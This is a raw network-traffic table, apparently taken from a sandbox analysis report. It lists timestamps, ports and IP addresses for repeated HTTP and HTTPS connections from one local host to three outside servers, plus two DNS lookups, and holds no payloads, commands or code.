Dec 10, 2024 14:07:40.651032925 CET	49763	443	192.168.2.5	104.21.67.152
Dec 10, 2024 14:07:40.655339003 CET	49756	80	192.168.2.5	132.226.247.73
Dec 10, 2024 14:07:40.683198929 CET	80	49757	132.226.247.73	192.168.2.5
Dec 10, 2024 14:07:40.683260918 CET	49757	80	192.168.2.5	132.226.247.73
Dec 10, 2024 14:07:40.684222937 CET	80	49771	132.226.247.73	192.168.2.5
Dec 10, 2024 14:07:40.684293985 CET	49771	80	192.168.2.5	132.226.247.73
Dec 10, 2024 14:07:40.684520960 CET	49771	80	192.168.2.5	132.226.247.73
Dec 10, 2024 14:07:40.774921894 CET	80	49756	132.226.247.73	192.168.2.5
Dec 10, 2024 14:07:40.803751945 CET	80	49771	132.226.247.73	192.168.2.5
Dec 10, 2024 14:07:41.098958969 CET	80	49756	132.226.247.73	192.168.2.5
Dec 10, 2024 14:07:41.101291895 CET	49772	443	192.168.2.5	104.21.67.152
Dec 10, 2024 14:07:41.101339102 CET	443	49772	104.21.67.152	192.168.2.5
Dec 10, 2024 14:07:41.101418018 CET	49772	443	192.168.2.5	104.21.67.152
Dec 10, 2024 14:07:41.101880074 CET	49772	443	192.168.2.5	104.21.67.152
Dec 10, 2024 14:07:41.101891994 CET	443	49772	104.21.67.152	192.168.2.5
Dec 10, 2024 14:07:41.144098997 CET	49756	80	192.168.2.5	132.226.247.73
Dec 10, 2024 14:07:41.993447065 CET	80	49771	132.226.247.73	192.168.2.5
Dec 10, 2024 14:07:41.994911909 CET	49774	443	192.168.2.5	104.21.67.152
Dec 10, 2024 14:07:41.994980097 CET	443	49774	104.21.67.152	192.168.2.5
Dec 10, 2024 14:07:41.995297909 CET	49774	443	192.168.2.5	104.21.67.152
Dec 10, 2024 14:07:41.995419025 CET	49774	443	192.168.2.5	104.21.67.152
Dec 10, 2024 14:07:41.995429993 CET	443	49774	104.21.67.152	192.168.2.5
Dec 10, 2024 14:07:42.034753084 CET	49771	80	192.168.2.5	132.226.247.73
Dec 10, 2024 14:07:42.336139917 CET	443	49772	104.21.67.152	192.168.2.5
Dec 10, 2024 14:07:42.341234922 CET	49772	443	192.168.2.5	104.21.67.152
Dec 10, 2024 14:07:42.341262102 CET	443	49772	104.21.67.152	192.168.2.5
Dec 10, 2024 14:07:42.784079075 CET	443	49772	104.21.67.152	192.168.2.5
Dec 10, 2024 14:07:42.784145117 CET	443	49772	104.21.67.152	192.168.2.5
Dec 10, 2024 14:07:42.784245968 CET	49772	443	192.168.2.5	104.21.67.152
Dec 10, 2024 14:07:42.842370033 CET	49772	443	192.168.2.5	104.21.67.152
Dec 10, 2024 14:07:42.847795963 CET	49756	80	192.168.2.5	132.226.247.73
Dec 10, 2024 14:07:42.849744081 CET	49779	80	192.168.2.5	132.226.247.73
Dec 10, 2024 14:07:42.967562914 CET	80	49756	132.226.247.73	192.168.2.5
Dec 10, 2024 14:07:42.969449043 CET	80	49779	132.226.247.73	192.168.2.5
Dec 10, 2024 14:07:42.969500065 CET	49756	80	192.168.2.5	132.226.247.73
Dec 10, 2024 14:07:42.969566107 CET	49779	80	192.168.2.5	132.226.247.73
Dec 10, 2024 14:07:43.014000893 CET	49779	80	192.168.2.5	132.226.247.73
Dec 10, 2024 14:07:43.133301020 CET	80	49779	132.226.247.73	192.168.2.5
Dec 10, 2024 14:07:43.210931063 CET	443	49774	104.21.67.152	192.168.2.5
Dec 10, 2024 14:07:43.213016987 CET	49774	443	192.168.2.5	104.21.67.152
Dec 10, 2024 14:07:43.213038921 CET	443	49774	104.21.67.152	192.168.2.5
Dec 10, 2024 14:07:43.657056093 CET	443	49774	104.21.67.152	192.168.2.5
Dec 10, 2024 14:07:43.657133102 CET	443	49774	104.21.67.152	192.168.2.5
Dec 10, 2024 14:07:43.657182932 CET	49774	443	192.168.2.5	104.21.67.152
Dec 10, 2024 14:07:43.657716036 CET	49774	443	192.168.2.5	104.21.67.152
Dec 10, 2024 14:07:43.663167953 CET	49780	80	192.168.2.5	132.226.247.73
Dec 10, 2024 14:07:43.783427954 CET	80	49780	132.226.247.73	192.168.2.5
Dec 10, 2024 14:07:43.783526897 CET	49780	80	192.168.2.5	132.226.247.73
Dec 10, 2024 14:07:43.783762932 CET	49780	80	192.168.2.5	132.226.247.73
Dec 10, 2024 14:07:43.904182911 CET	80	49780	132.226.247.73	192.168.2.5
Dec 10, 2024 14:07:44.282963991 CET	80	49779	132.226.247.73	192.168.2.5
Dec 10, 2024 14:07:44.286365986 CET	49782	443	192.168.2.5	104.21.67.152
Dec 10, 2024 14:07:44.286418915 CET	443	49782	104.21.67.152	192.168.2.5
Dec 10, 2024 14:07:44.286497116 CET	49782	443	192.168.2.5	104.21.67.152
Dec 10, 2024 14:07:44.287234068 CET	49782	443	192.168.2.5	104.21.67.152
Dec 10, 2024 14:07:44.287250042 CET	443	49782	104.21.67.152	192.168.2.5
Dec 10, 2024 14:07:44.331589937 CET	49779	80	192.168.2.5	132.226.247.73
Dec 10, 2024 14:07:45.088120937 CET	80	49780	132.226.247.73	192.168.2.5
Dec 10, 2024 14:07:45.089487076 CET	49787	443	192.168.2.5	104.21.67.152
Dec 10, 2024 14:07:45.089535952 CET	443	49787	104.21.67.152	192.168.2.5
Dec 10, 2024 14:07:45.089617014 CET	49787	443	192.168.2.5	104.21.67.152
Dec 10, 2024 14:07:45.089970112 CET	49787	443	192.168.2.5	104.21.67.152
Dec 10, 2024 14:07:45.089986086 CET	443	49787	104.21.67.152	192.168.2.5
Dec 10, 2024 14:07:45.128504038 CET	49780	80	192.168.2.5	132.226.247.73
Dec 10, 2024 14:07:45.510138988 CET	443	49782	104.21.67.152	192.168.2.5
Dec 10, 2024 14:07:45.566031933 CET	49782	443	192.168.2.5	104.21.67.152
Dec 10, 2024 14:07:45.625463963 CET	49782	443	192.168.2.5	104.21.67.152
Dec 10, 2024 14:07:45.625484943 CET	443	49782	104.21.67.152	192.168.2.5
Dec 10, 2024 14:07:45.957271099 CET	443	49782	104.21.67.152	192.168.2.5
Dec 10, 2024 14:07:45.957343102 CET	443	49782	104.21.67.152	192.168.2.5
Dec 10, 2024 14:07:45.957410097 CET	49782	443	192.168.2.5	104.21.67.152
Dec 10, 2024 14:07:45.981719971 CET	49782	443	192.168.2.5	104.21.67.152
Dec 10, 2024 14:07:46.036672115 CET	49779	80	192.168.2.5	132.226.247.73
Dec 10, 2024 14:07:46.039582968 CET	49788	80	192.168.2.5	132.226.247.73
Dec 10, 2024 14:07:46.156311035 CET	80	49779	132.226.247.73	192.168.2.5
Dec 10, 2024 14:07:46.156366110 CET	49779	80	192.168.2.5	132.226.247.73
Dec 10, 2024 14:07:46.158840895 CET	80	49788	132.226.247.73	192.168.2.5
Dec 10, 2024 14:07:46.158915043 CET	49788	80	192.168.2.5	132.226.247.73
Dec 10, 2024 14:07:46.159135103 CET	49788	80	192.168.2.5	132.226.247.73
Dec 10, 2024 14:07:46.278755903 CET	80	49788	132.226.247.73	192.168.2.5
Dec 10, 2024 14:07:46.401141882 CET	443	49787	104.21.67.152	192.168.2.5
Dec 10, 2024 14:07:46.403110981 CET	49787	443	192.168.2.5	104.21.67.152
Dec 10, 2024 14:07:46.403131962 CET	443	49787	104.21.67.152	192.168.2.5
Dec 10, 2024 14:07:46.970649004 CET	443	49787	104.21.67.152	192.168.2.5
Dec 10, 2024 14:07:46.970720053 CET	443	49787	104.21.67.152	192.168.2.5
Dec 10, 2024 14:07:46.970828056 CET	49787	443	192.168.2.5	104.21.67.152
Dec 10, 2024 14:07:46.971411943 CET	49787	443	192.168.2.5	104.21.67.152
Dec 10, 2024 14:07:46.974888086 CET	49780	80	192.168.2.5	132.226.247.73
Dec 10, 2024 14:07:46.975927114 CET	49796	80	192.168.2.5	132.226.247.73
Dec 10, 2024 14:07:47.095328093 CET	80	49780	132.226.247.73	192.168.2.5
Dec 10, 2024 14:07:47.095495939 CET	80	49796	132.226.247.73	192.168.2.5
Dec 10, 2024 14:07:47.095525980 CET	49780	80	192.168.2.5	132.226.247.73
Dec 10, 2024 14:07:47.095596075 CET	49796	80	192.168.2.5	132.226.247.73
Dec 10, 2024 14:07:47.095786095 CET	49796	80	192.168.2.5	132.226.247.73
Dec 10, 2024 14:07:47.215049982 CET	80	49796	132.226.247.73	192.168.2.5
Dec 10, 2024 14:07:47.462845087 CET	80	49788	132.226.247.73	192.168.2.5
Dec 10, 2024 14:07:47.464541912 CET	49797	443	192.168.2.5	104.21.67.152
Dec 10, 2024 14:07:47.464592934 CET	443	49797	104.21.67.152	192.168.2.5
Dec 10, 2024 14:07:47.464744091 CET	49797	443	192.168.2.5	104.21.67.152
Dec 10, 2024 14:07:47.465154886 CET	49797	443	192.168.2.5	104.21.67.152
Dec 10, 2024 14:07:47.465174913 CET	443	49797	104.21.67.152	192.168.2.5
Dec 10, 2024 14:07:47.503488064 CET	49788	80	192.168.2.5	132.226.247.73
Dec 10, 2024 14:07:48.399054050 CET	80	49796	132.226.247.73	192.168.2.5
Dec 10, 2024 14:07:48.432101011 CET	49799	443	192.168.2.5	104.21.67.152
Dec 10, 2024 14:07:48.432142019 CET	443	49799	104.21.67.152	192.168.2.5
Dec 10, 2024 14:07:48.432249069 CET	49799	443	192.168.2.5	104.21.67.152
Dec 10, 2024 14:07:48.432745934 CET	49799	443	192.168.2.5	104.21.67.152
Dec 10, 2024 14:07:48.432759047 CET	443	49799	104.21.67.152	192.168.2.5
Dec 10, 2024 14:07:48.441365004 CET	49796	80	192.168.2.5	132.226.247.73
Dec 10, 2024 14:07:48.674525023 CET	443	49797	104.21.67.152	192.168.2.5
Dec 10, 2024 14:07:48.690156937 CET	49797	443	192.168.2.5	104.21.67.152
Dec 10, 2024 14:07:48.690176010 CET	443	49797	104.21.67.152	192.168.2.5
Dec 10, 2024 14:07:49.120794058 CET	443	49797	104.21.67.152	192.168.2.5
Dec 10, 2024 14:07:49.120874882 CET	443	49797	104.21.67.152	192.168.2.5
Dec 10, 2024 14:07:49.120925903 CET	49797	443	192.168.2.5	104.21.67.152
Dec 10, 2024 14:07:49.121381998 CET	49797	443	192.168.2.5	104.21.67.152
Dec 10, 2024 14:07:49.126485109 CET	49804	80	192.168.2.5	132.226.247.73
Dec 10, 2024 14:07:49.246260881 CET	80	49804	132.226.247.73	192.168.2.5
Dec 10, 2024 14:07:49.246346951 CET	49804	80	192.168.2.5	132.226.247.73
Dec 10, 2024 14:07:49.246586084 CET	49804	80	192.168.2.5	132.226.247.73
Dec 10, 2024 14:07:49.365870953 CET	80	49804	132.226.247.73	192.168.2.5
Dec 10, 2024 14:07:49.644953966 CET	443	49799	104.21.67.152	192.168.2.5
Dec 10, 2024 14:07:49.646946907 CET	49799	443	192.168.2.5	104.21.67.152
Dec 10, 2024 14:07:49.646972895 CET	443	49799	104.21.67.152	192.168.2.5
Dec 10, 2024 14:07:50.091555119 CET	443	49799	104.21.67.152	192.168.2.5
Dec 10, 2024 14:07:50.091619015 CET	443	49799	104.21.67.152	192.168.2.5
Dec 10, 2024 14:07:50.091950893 CET	49799	443	192.168.2.5	104.21.67.152
Dec 10, 2024 14:07:50.092228889 CET	49799	443	192.168.2.5	104.21.67.152
Dec 10, 2024 14:07:50.095556974 CET	49796	80	192.168.2.5	132.226.247.73
Dec 10, 2024 14:07:50.096851110 CET	49805	80	192.168.2.5	132.226.247.73
Dec 10, 2024 14:07:50.215511084 CET	80	49796	132.226.247.73	192.168.2.5
Dec 10, 2024 14:07:50.215569973 CET	49796	80	192.168.2.5	132.226.247.73
Dec 10, 2024 14:07:50.216298103 CET	80	49805	132.226.247.73	192.168.2.5
Dec 10, 2024 14:07:50.216377974 CET	49805	80	192.168.2.5	132.226.247.73
Dec 10, 2024 14:07:50.216514111 CET	49805	80	192.168.2.5	132.226.247.73
Dec 10, 2024 14:07:50.335791111 CET	80	49805	132.226.247.73	192.168.2.5
Dec 10, 2024 14:07:50.549803019 CET	80	49804	132.226.247.73	192.168.2.5
Dec 10, 2024 14:07:50.551232100 CET	49807	443	192.168.2.5	104.21.67.152
Dec 10, 2024 14:07:50.551304102 CET	443	49807	104.21.67.152	192.168.2.5
Dec 10, 2024 14:07:50.551418066 CET	49807	443	192.168.2.5	104.21.67.152
Dec 10, 2024 14:07:50.551650047 CET	49807	443	192.168.2.5	104.21.67.152
Dec 10, 2024 14:07:50.551666021 CET	443	49807	104.21.67.152	192.168.2.5
Dec 10, 2024 14:07:50.597223043 CET	49804	80	192.168.2.5	132.226.247.73
Dec 10, 2024 14:07:51.520323038 CET	80	49805	132.226.247.73	192.168.2.5
Dec 10, 2024 14:07:51.526185036 CET	49812	443	192.168.2.5	104.21.67.152
Dec 10, 2024 14:07:51.526196957 CET	443	49812	104.21.67.152	192.168.2.5
Dec 10, 2024 14:07:51.526266098 CET	49812	443	192.168.2.5	104.21.67.152
Dec 10, 2024 14:07:51.526510000 CET	49812	443	192.168.2.5	104.21.67.152
Dec 10, 2024 14:07:51.526523113 CET	443	49812	104.21.67.152	192.168.2.5
Dec 10, 2024 14:07:51.566071033 CET	49805	80	192.168.2.5	132.226.247.73
Dec 10, 2024 14:07:51.760472059 CET	443	49807	104.21.67.152	192.168.2.5
Dec 10, 2024 14:07:51.762768984 CET	49807	443	192.168.2.5	104.21.67.152
Dec 10, 2024 14:07:51.762789965 CET	443	49807	104.21.67.152	192.168.2.5
Dec 10, 2024 14:07:52.205436945 CET	443	49807	104.21.67.152	192.168.2.5
Dec 10, 2024 14:07:52.205506086 CET	443	49807	104.21.67.152	192.168.2.5
Dec 10, 2024 14:07:52.205661058 CET	49807	443	192.168.2.5	104.21.67.152
Dec 10, 2024 14:07:52.206393957 CET	49807	443	192.168.2.5	104.21.67.152
Dec 10, 2024 14:07:52.210249901 CET	49804	80	192.168.2.5	132.226.247.73
Dec 10, 2024 14:07:52.211922884 CET	49813	80	192.168.2.5	132.226.247.73
Dec 10, 2024 14:07:52.331540108 CET	80	49804	132.226.247.73	192.168.2.5
Dec 10, 2024 14:07:52.332779884 CET	80	49813	132.226.247.73	192.168.2.5
Dec 10, 2024 14:07:52.332844019 CET	49804	80	192.168.2.5	132.226.247.73
Dec 10, 2024 14:07:52.332881927 CET	49813	80	192.168.2.5	132.226.247.73
Dec 10, 2024 14:07:52.333015919 CET	49813	80	192.168.2.5	132.226.247.73
Dec 10, 2024 14:07:52.452370882 CET	80	49813	132.226.247.73	192.168.2.5
Dec 10, 2024 14:07:52.744811058 CET	443	49812	104.21.67.152	192.168.2.5
Dec 10, 2024 14:07:52.747062922 CET	49812	443	192.168.2.5	104.21.67.152
Dec 10, 2024 14:07:52.747092009 CET	443	49812	104.21.67.152	192.168.2.5
Dec 10, 2024 14:07:53.192178011 CET	443	49812	104.21.67.152	192.168.2.5
Dec 10, 2024 14:07:53.192245007 CET	443	49812	104.21.67.152	192.168.2.5
Dec 10, 2024 14:07:53.192373037 CET	49812	443	192.168.2.5	104.21.67.152
Dec 10, 2024 14:07:53.192977905 CET	49812	443	192.168.2.5	104.21.67.152
Dec 10, 2024 14:07:53.197033882 CET	49805	80	192.168.2.5	132.226.247.73
Dec 10, 2024 14:07:53.198091030 CET	49819	80	192.168.2.5	132.226.247.73
Dec 10, 2024 14:07:53.316751957 CET	80	49805	132.226.247.73	192.168.2.5
Dec 10, 2024 14:07:53.316829920 CET	49805	80	192.168.2.5	132.226.247.73
Dec 10, 2024 14:07:53.317365885 CET	80	49819	132.226.247.73	192.168.2.5
Dec 10, 2024 14:07:53.317439079 CET	49819	80	192.168.2.5	132.226.247.73
Dec 10, 2024 14:07:53.317639112 CET	49819	80	192.168.2.5	132.226.247.73
Dec 10, 2024 14:07:53.437031984 CET	80	49819	132.226.247.73	192.168.2.5
Dec 10, 2024 14:07:53.680546999 CET	80	49813	132.226.247.73	192.168.2.5
Dec 10, 2024 14:07:53.681991100 CET	49820	443	192.168.2.5	104.21.67.152
Dec 10, 2024 14:07:53.682035923 CET	443	49820	104.21.67.152	192.168.2.5
Dec 10, 2024 14:07:53.682142973 CET	49820	443	192.168.2.5	104.21.67.152
Dec 10, 2024 14:07:53.682460070 CET	49820	443	192.168.2.5	104.21.67.152
Dec 10, 2024 14:07:53.682473898 CET	443	49820	104.21.67.152	192.168.2.5
Dec 10, 2024 14:07:53.722309113 CET	49813	80	192.168.2.5	132.226.247.73
Dec 10, 2024 14:07:54.621526957 CET	80	49819	132.226.247.73	192.168.2.5
Dec 10, 2024 14:07:54.625670910 CET	49821	443	192.168.2.5	104.21.67.152
Dec 10, 2024 14:07:54.625730991 CET	443	49821	104.21.67.152	192.168.2.5
Dec 10, 2024 14:07:54.625812054 CET	49821	443	192.168.2.5	104.21.67.152
Dec 10, 2024 14:07:54.626120090 CET	49821	443	192.168.2.5	104.21.67.152
Dec 10, 2024 14:07:54.626133919 CET	443	49821	104.21.67.152	192.168.2.5
Dec 10, 2024 14:07:54.675365925 CET	49819	80	192.168.2.5	132.226.247.73
Dec 10, 2024 14:07:54.893287897 CET	443	49820	104.21.67.152	192.168.2.5
Dec 10, 2024 14:07:54.895850897 CET	49820	443	192.168.2.5	104.21.67.152
Dec 10, 2024 14:07:54.895865917 CET	443	49820	104.21.67.152	192.168.2.5
Dec 10, 2024 14:07:55.349499941 CET	443	49820	104.21.67.152	192.168.2.5
Dec 10, 2024 14:07:55.349562883 CET	443	49820	104.21.67.152	192.168.2.5
Dec 10, 2024 14:07:55.349636078 CET	49820	443	192.168.2.5	104.21.67.152
Dec 10, 2024 14:07:55.350023985 CET	49820	443	192.168.2.5	104.21.67.152
Dec 10, 2024 14:07:55.353837013 CET	49813	80	192.168.2.5	132.226.247.73
Dec 10, 2024 14:07:55.354489088 CET	49827	80	192.168.2.5	132.226.247.73
Dec 10, 2024 14:07:55.474040985 CET	80	49827	132.226.247.73	192.168.2.5
Dec 10, 2024 14:07:55.474083900 CET	80	49813	132.226.247.73	192.168.2.5
Dec 10, 2024 14:07:55.474224091 CET	49813	80	192.168.2.5	132.226.247.73
Dec 10, 2024 14:07:55.474240065 CET	49827	80	192.168.2.5	132.226.247.73
Dec 10, 2024 14:07:55.474354982 CET	49827	80	192.168.2.5	132.226.247.73
Dec 10, 2024 14:07:55.593529940 CET	80	49827	132.226.247.73	192.168.2.5
Dec 10, 2024 14:07:55.837510109 CET	443	49821	104.21.67.152	192.168.2.5
Dec 10, 2024 14:07:55.839102983 CET	49821	443	192.168.2.5	104.21.67.152
Dec 10, 2024 14:07:55.839126110 CET	443	49821	104.21.67.152	192.168.2.5
Dec 10, 2024 14:07:56.282074928 CET	443	49821	104.21.67.152	192.168.2.5
Dec 10, 2024 14:07:56.282143116 CET	443	49821	104.21.67.152	192.168.2.5
Dec 10, 2024 14:07:56.282212973 CET	49821	443	192.168.2.5	104.21.67.152
Dec 10, 2024 14:07:56.282677889 CET	49821	443	192.168.2.5	104.21.67.152
Dec 10, 2024 14:07:56.285963058 CET	49819	80	192.168.2.5	132.226.247.73
Dec 10, 2024 14:07:56.286854982 CET	49828	80	192.168.2.5	132.226.247.73
Dec 10, 2024 14:07:56.405620098 CET	80	49819	132.226.247.73	192.168.2.5
Dec 10, 2024 14:07:56.405678034 CET	49819	80	192.168.2.5	132.226.247.73
Dec 10, 2024 14:07:56.406200886 CET	80	49828	132.226.247.73	192.168.2.5
Dec 10, 2024 14:07:56.406373024 CET	49828	80	192.168.2.5	132.226.247.73
Dec 10, 2024 14:07:56.408404112 CET	49828	80	192.168.2.5	132.226.247.73
Dec 10, 2024 14:07:56.527760983 CET	80	49828	132.226.247.73	192.168.2.5
Dec 10, 2024 14:07:56.777501106 CET	80	49827	132.226.247.73	192.168.2.5
Dec 10, 2024 14:07:56.798696041 CET	49829	443	192.168.2.5	104.21.67.152
Dec 10, 2024 14:07:56.798741102 CET	443	49829	104.21.67.152	192.168.2.5
Dec 10, 2024 14:07:56.798808098 CET	49829	443	192.168.2.5	104.21.67.152
Dec 10, 2024 14:07:56.799397945 CET	49829	443	192.168.2.5	104.21.67.152
Dec 10, 2024 14:07:56.799416065 CET	443	49829	104.21.67.152	192.168.2.5
Dec 10, 2024 14:07:56.831634998 CET	49827	80	192.168.2.5	132.226.247.73
Dec 10, 2024 14:07:57.709773064 CET	80	49828	132.226.247.73	192.168.2.5
Dec 10, 2024 14:07:57.711083889 CET	49835	443	192.168.2.5	104.21.67.152
Dec 10, 2024 14:07:57.711122036 CET	443	49835	104.21.67.152	192.168.2.5
Dec 10, 2024 14:07:57.711188078 CET	49835	443	192.168.2.5	104.21.67.152
Dec 10, 2024 14:07:57.711551905 CET	49835	443	192.168.2.5	104.21.67.152
Dec 10, 2024 14:07:57.711565971 CET	443	49835	104.21.67.152	192.168.2.5
Dec 10, 2024 14:07:57.753499031 CET	49828	80	192.168.2.5	132.226.247.73
Dec 10, 2024 14:07:58.008435011 CET	443	49829	104.21.67.152	192.168.2.5
Dec 10, 2024 14:07:58.010073900 CET	49829	443	192.168.2.5	104.21.67.152
Dec 10, 2024 14:07:58.010099888 CET	443	49829	104.21.67.152	192.168.2.5
Dec 10, 2024 14:07:58.454283953 CET	443	49829	104.21.67.152	192.168.2.5
Dec 10, 2024 14:07:58.454348087 CET	443	49829	104.21.67.152	192.168.2.5
Dec 10, 2024 14:07:58.454401970 CET	49829	443	192.168.2.5	104.21.67.152
Dec 10, 2024 14:07:58.454863071 CET	49829	443	192.168.2.5	104.21.67.152
Dec 10, 2024 14:07:58.463989019 CET	49827	80	192.168.2.5	132.226.247.73
Dec 10, 2024 14:07:58.468755007 CET	49836	80	192.168.2.5	132.226.247.73
Dec 10, 2024 14:07:58.584733963 CET	80	49827	132.226.247.73	192.168.2.5
Dec 10, 2024 14:07:58.584827900 CET	49827	80	192.168.2.5	132.226.247.73
Dec 10, 2024 14:07:58.588428020 CET	80	49836	132.226.247.73	192.168.2.5
Dec 10, 2024 14:07:58.588522911 CET	49836	80	192.168.2.5	132.226.247.73
Dec 10, 2024 14:07:58.588660955 CET	49836	80	192.168.2.5	132.226.247.73
Dec 10, 2024 14:07:58.708342075 CET	80	49836	132.226.247.73	192.168.2.5
Dec 10, 2024 14:07:58.922326088 CET	443	49835	104.21.67.152	192.168.2.5
Dec 10, 2024 14:07:58.925069094 CET	49835	443	192.168.2.5	104.21.67.152
Dec 10, 2024 14:07:58.925096035 CET	443	49835	104.21.67.152	192.168.2.5
Dec 10, 2024 14:07:59.443609953 CET	443	49835	104.21.67.152	192.168.2.5
Dec 10, 2024 14:07:59.443681002 CET	443	49835	104.21.67.152	192.168.2.5
Dec 10, 2024 14:07:59.443950891 CET	49835	443	192.168.2.5	104.21.67.152
Dec 10, 2024 14:07:59.444214106 CET	49835	443	192.168.2.5	104.21.67.152
Dec 10, 2024 14:07:59.633766890 CET	49828	80	192.168.2.5	132.226.247.73
Dec 10, 2024 14:07:59.753832102 CET	80	49828	132.226.247.73	192.168.2.5
Dec 10, 2024 14:07:59.753902912 CET	49828	80	192.168.2.5	132.226.247.73
Dec 10, 2024 14:07:59.773072958 CET	49840	443	192.168.2.5	149.154.167.220
Dec 10, 2024 14:07:59.773106098 CET	443	49840	149.154.167.220	192.168.2.5
Dec 10, 2024 14:07:59.773166895 CET	49840	443	192.168.2.5	149.154.167.220
Dec 10, 2024 14:07:59.773807049 CET	49840	443	192.168.2.5	149.154.167.220
Dec 10, 2024 14:07:59.773823977 CET	443	49840	149.154.167.220	192.168.2.5
Dec 10, 2024 14:07:59.892184973 CET	80	49836	132.226.247.73	192.168.2.5
Dec 10, 2024 14:07:59.941000938 CET	49836	80	192.168.2.5	132.226.247.73
Dec 10, 2024 14:07:59.944067001 CET	49841	443	192.168.2.5	104.21.67.152
Dec 10, 2024 14:07:59.944116116 CET	443	49841	104.21.67.152	192.168.2.5
Dec 10, 2024 14:07:59.944190979 CET	49841	443	192.168.2.5	104.21.67.152
Dec 10, 2024 14:07:59.944432020 CET	49841	443	192.168.2.5	104.21.67.152
Dec 10, 2024 14:07:59.944447994 CET	443	49841	104.21.67.152	192.168.2.5
Dec 10, 2024 14:08:01.370697975 CET	443	49841	104.21.67.152	192.168.2.5
Dec 10, 2024 14:08:01.372560024 CET	49841	443	192.168.2.5	104.21.67.152
Dec 10, 2024 14:08:01.372575045 CET	443	49841	104.21.67.152	192.168.2.5
Dec 10, 2024 14:08:01.375725031 CET	443	49840	149.154.167.220	192.168.2.5
Dec 10, 2024 14:08:01.375790119 CET	49840	443	192.168.2.5	149.154.167.220
Dec 10, 2024 14:08:01.377469063 CET	49840	443	192.168.2.5	149.154.167.220
Dec 10, 2024 14:08:01.377479076 CET	443	49840	149.154.167.220	192.168.2.5
Dec 10, 2024 14:08:01.379640102 CET	443	49840	149.154.167.220	192.168.2.5
Dec 10, 2024 14:08:01.381025076 CET	49840	443	192.168.2.5	149.154.167.220
Dec 10, 2024 14:08:01.423343897 CET	443	49840	149.154.167.220	192.168.2.5
Dec 10, 2024 14:08:01.817886114 CET	443	49841	104.21.67.152	192.168.2.5
Dec 10, 2024 14:08:01.817966938 CET	443	49841	104.21.67.152	192.168.2.5
Dec 10, 2024 14:08:01.818042040 CET	49841	443	192.168.2.5	104.21.67.152
Dec 10, 2024 14:08:01.818562984 CET	49841	443	192.168.2.5	104.21.67.152
Dec 10, 2024 14:08:01.821573019 CET	49836	80	192.168.2.5	132.226.247.73
Dec 10, 2024 14:08:01.822768927 CET	49845	80	192.168.2.5	132.226.247.73
Dec 10, 2024 14:08:01.878835917 CET	443	49840	149.154.167.220	192.168.2.5
Dec 10, 2024 14:08:01.878931999 CET	443	49840	149.154.167.220	192.168.2.5
Dec 10, 2024 14:08:01.879021883 CET	49840	443	192.168.2.5	149.154.167.220
Dec 10, 2024 14:08:01.941247940 CET	80	49836	132.226.247.73	192.168.2.5
Dec 10, 2024 14:08:01.941332102 CET	49836	80	192.168.2.5	132.226.247.73
Dec 10, 2024 14:08:01.942014933 CET	80	49845	132.226.247.73	192.168.2.5
Dec 10, 2024 14:08:01.942087889 CET	49845	80	192.168.2.5	132.226.247.73
Dec 10, 2024 14:08:01.942286015 CET	49845	80	192.168.2.5	132.226.247.73
Dec 10, 2024 14:08:01.958417892 CET	49840	443	192.168.2.5	149.154.167.220
Dec 10, 2024 14:08:02.062144041 CET	80	49845	132.226.247.73	192.168.2.5
Dec 10, 2024 14:08:03.285345078 CET	80	49845	132.226.247.73	192.168.2.5
Dec 10, 2024 14:08:03.293658018 CET	49850	443	192.168.2.5	104.21.67.152
Dec 10, 2024 14:08:03.293719053 CET	443	49850	104.21.67.152	192.168.2.5
Dec 10, 2024 14:08:03.293816090 CET	49850	443	192.168.2.5	104.21.67.152
Dec 10, 2024 14:08:03.294827938 CET	49850	443	192.168.2.5	104.21.67.152
Dec 10, 2024 14:08:03.294845104 CET	443	49850	104.21.67.152	192.168.2.5
Dec 10, 2024 14:08:03.331598043 CET	49845	80	192.168.2.5	132.226.247.73
Dec 10, 2024 14:08:04.506999969 CET	443	49850	104.21.67.152	192.168.2.5
Dec 10, 2024 14:08:04.508569002 CET	49850	443	192.168.2.5	104.21.67.152
Dec 10, 2024 14:08:04.508598089 CET	443	49850	104.21.67.152	192.168.2.5
Dec 10, 2024 14:08:04.954432011 CET	443	49850	104.21.67.152	192.168.2.5
Dec 10, 2024 14:08:04.954513073 CET	443	49850	104.21.67.152	192.168.2.5
Dec 10, 2024 14:08:04.954627991 CET	49850	443	192.168.2.5	104.21.67.152
Dec 10, 2024 14:08:04.955260992 CET	49850	443	192.168.2.5	104.21.67.152
Dec 10, 2024 14:08:04.965027094 CET	49845	80	192.168.2.5	132.226.247.73
Dec 10, 2024 14:08:04.965908051 CET	49856	443	192.168.2.5	149.154.167.220
Dec 10, 2024 14:08:04.965940952 CET	443	49856	149.154.167.220	192.168.2.5
Dec 10, 2024 14:08:04.966044903 CET	49856	443	192.168.2.5	149.154.167.220
Dec 10, 2024 14:08:04.966440916 CET	49856	443	192.168.2.5	149.154.167.220
Dec 10, 2024 14:08:04.966454983 CET	443	49856	149.154.167.220	192.168.2.5
Dec 10, 2024 14:08:05.085083961 CET	80	49845	132.226.247.73	192.168.2.5
Dec 10, 2024 14:08:05.085143089 CET	49845	80	192.168.2.5	132.226.247.73
Dec 10, 2024 14:08:06.396554947 CET	443	49856	149.154.167.220	192.168.2.5
Dec 10, 2024 14:08:06.396697044 CET	49856	443	192.168.2.5	149.154.167.220
Dec 10, 2024 14:08:06.398386955 CET	49856	443	192.168.2.5	149.154.167.220
Dec 10, 2024 14:08:06.398396969 CET	443	49856	149.154.167.220	192.168.2.5
Dec 10, 2024 14:08:06.398662090 CET	443	49856	149.154.167.220	192.168.2.5
Dec 10, 2024 14:08:06.400799036 CET	49856	443	192.168.2.5	149.154.167.220
Dec 10, 2024 14:08:06.443327904 CET	443	49856	149.154.167.220	192.168.2.5
Dec 10, 2024 14:08:06.950026035 CET	443	49856	149.154.167.220	192.168.2.5
Dec 10, 2024 14:08:06.950119019 CET	443	49856	149.154.167.220	192.168.2.5
Dec 10, 2024 14:08:06.950229883 CET	49856	443	192.168.2.5	149.154.167.220
Dec 10, 2024 14:08:06.952513933 CET	49856	443	192.168.2.5	149.154.167.220
Dec 10, 2024 14:08:16.503103018 CET	49771	80	192.168.2.5	132.226.247.73
Dec 10, 2024 14:08:21.437921047 CET	49788	80	192.168.2.5	132.226.247.73

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 10, 2024 14:07:30.682384014 CET	51737	53	192.168.2.5	1.1.1.1
Dec 10, 2024 14:07:30.822252035 CET	53	51737	1.1.1.1	192.168.2.5
Dec 10, 2024 14:07:33.059812069 CET	61717	53	192.168.2.5	1.1.1.1
Dec 10, 2024 14:07:33.200965881 CET	53	61717	1.1.1.1	192.168.2.5
